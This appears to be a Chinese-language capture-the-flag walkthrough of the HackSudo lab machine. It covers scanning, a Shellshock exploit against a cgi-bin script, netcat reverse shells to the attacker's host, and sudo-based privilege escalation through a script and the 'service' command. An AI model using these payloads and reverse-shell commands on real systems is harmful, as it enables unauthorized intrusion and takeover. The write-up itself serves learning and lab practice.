前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >HackSudo

HackSudo

作者头像
XRSec
发布2022-03-12 15:47:29
3190
发布2022-03-12 15:47:29
举报
文章被收录于专栏:XRSec.Blog

靶机介绍

目标介绍 :Debian Linux (目标是个网上在线银行系统)

攻击主机 : kali Linux

利用技术

  • shellshock破壳漏洞<–cgi-bin–>
  • GTFOBins提权
  • github开源源码泄露

打靶开始

1.信息收集

(偷个懒直接上命令了)

代码语言:javascript
复制
sudo arp-scan -l
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.102	08:00:27:c5:88:8d	PCS Systemtechnik GmbH

$ nmap -p- -sC -sV 192.168.0.102
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-30 02:53 EDT
Nmap scan report for localhost (192.168.0.102)
Host is up (0.0015s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
|   256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_  256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目标的IP是 192.168.0.102 开放的服务有80 22端口

目标的基本信息已经明确,下一步就是对目标进行更深层的信息收集,以便得到更深层的信息,方便后期的漏洞利用

使用工具dirsearch可以挖掘到目标的存在页面

代码语言:javascript
复制
┌──(yifang㉿yifang)-[~]
└─$ dirsearch -u http://192.168.0.102/

[02:59:56] 403 -  278B  - /cgi-bin/
[03:01:17] 200 -    4KB - /README.md
[03:01:19] 200 -    1KB - /admin_login.php
[03:01:21] 200 -    4KB - /contact.php
[03:01:23] 200 -  472B  - /header.php
[03:01:23] 200 -    5KB - /home.php
[03:01:23] 200 -    4KB - /images/
[03:01:23] 200 -    5KB - /index.php
[03:01:23] 200 -    5KB - /index.php/login/
[03:01:25] 200 -    8KB - /news.php

在进一步查看只会发现有价值的信息就是admin_login.php,这个是管理员的登录地址。还有比较有意思的就是README.md文件

2.源码泄露

README.md文件中有一些提示

剩下的操作岂不是信手拈来?直接在后台

页面登录

可以登录后台,但是在一番尝试后,发现并没有任何*用,于是尝试寻找其他漏洞

3.shellshock漏洞

在信息收集的时候发现了cgi-bin的目录,有这个目录也就以为着可能存在shellshock[破壳漏洞],在扫描的时候,反馈的是403状态,但是并不代表底下的文件不能被访问,于是尝试使用dirsearch进行暴力破解

代码语言:javascript
复制
┌──(yifang㉿yifang)-[~]
└─$ dirsearch -u http://192.168.0.102/cgi-bin/  -f -e sh,cgi 
[03:11:41] Starting: 
[03:11:56] 500 -  611B  - /cgi-bin/backup.cgi
[03:12:11] 500 -  611B  - /cgi-bin/shell.sh
[03:12:11] 500 -  650B  - /cgi-bin/shell.sh/

果然存在两个文件,如果这个两个文件如果存在漏洞的话,那么就可以直接调用操作系统的Bash[需要当前操作系统bash存在漏洞]

4.边境突破

nmap正好集成了这一类漏洞的POC,可以来试试

代码语言:javascript
复制
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.0.102
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.

nmap已经爆出了CVE编号,百度搜索一波CVE-2014-6271

可以参考一下以下文章

接下来就是漏洞利用

代码语言:javascript
复制
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'nc -e /bin/bash 192.168.0.103 4444'" http://192.168.0.103/cgi-bin/backup.cgi

Kali端

代码语言:javascript
复制
nc -lvp 4444

成功接收到shell

5.权限提升

得到了目标的www用户的shell,这个权限是很低的,因此要继续寻找其他漏洞,以供获取更高的权限

首先老传统,先升级nc的shell,python -c 'import pty; pty.spawn("/bin/bash")'

然后,sudo -l命令寻找可以免密码运行的程序

看到这里,当然是想去运行一下这个文件到底是干什么的

代码语言:javascript
复制
sudo -u thor  /home/thor/./hammer.sh

thor身份运行hammer.sh文件,发现可以执行操作系统命令,直接执行nc -e /bin/bash 192.168.0.103 5555

然后使用python -c 'import pty; pty.spawn("/bin/bash")' && sudo -l寻找能够提权的方法,发现thor用户拥有执行service命令SUDO权力,在GTFBins网站,寻找service的提权方式

sudo service ../../bin/sh

提权成功

打靶结束!!!

XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-10-30,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 靶机介绍
  • 打靶开始
    • 1.信息收集
      • 2.源码泄露
        • 3.shellshock漏洞
          • 4.边境突破
            • 5.权限提升
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档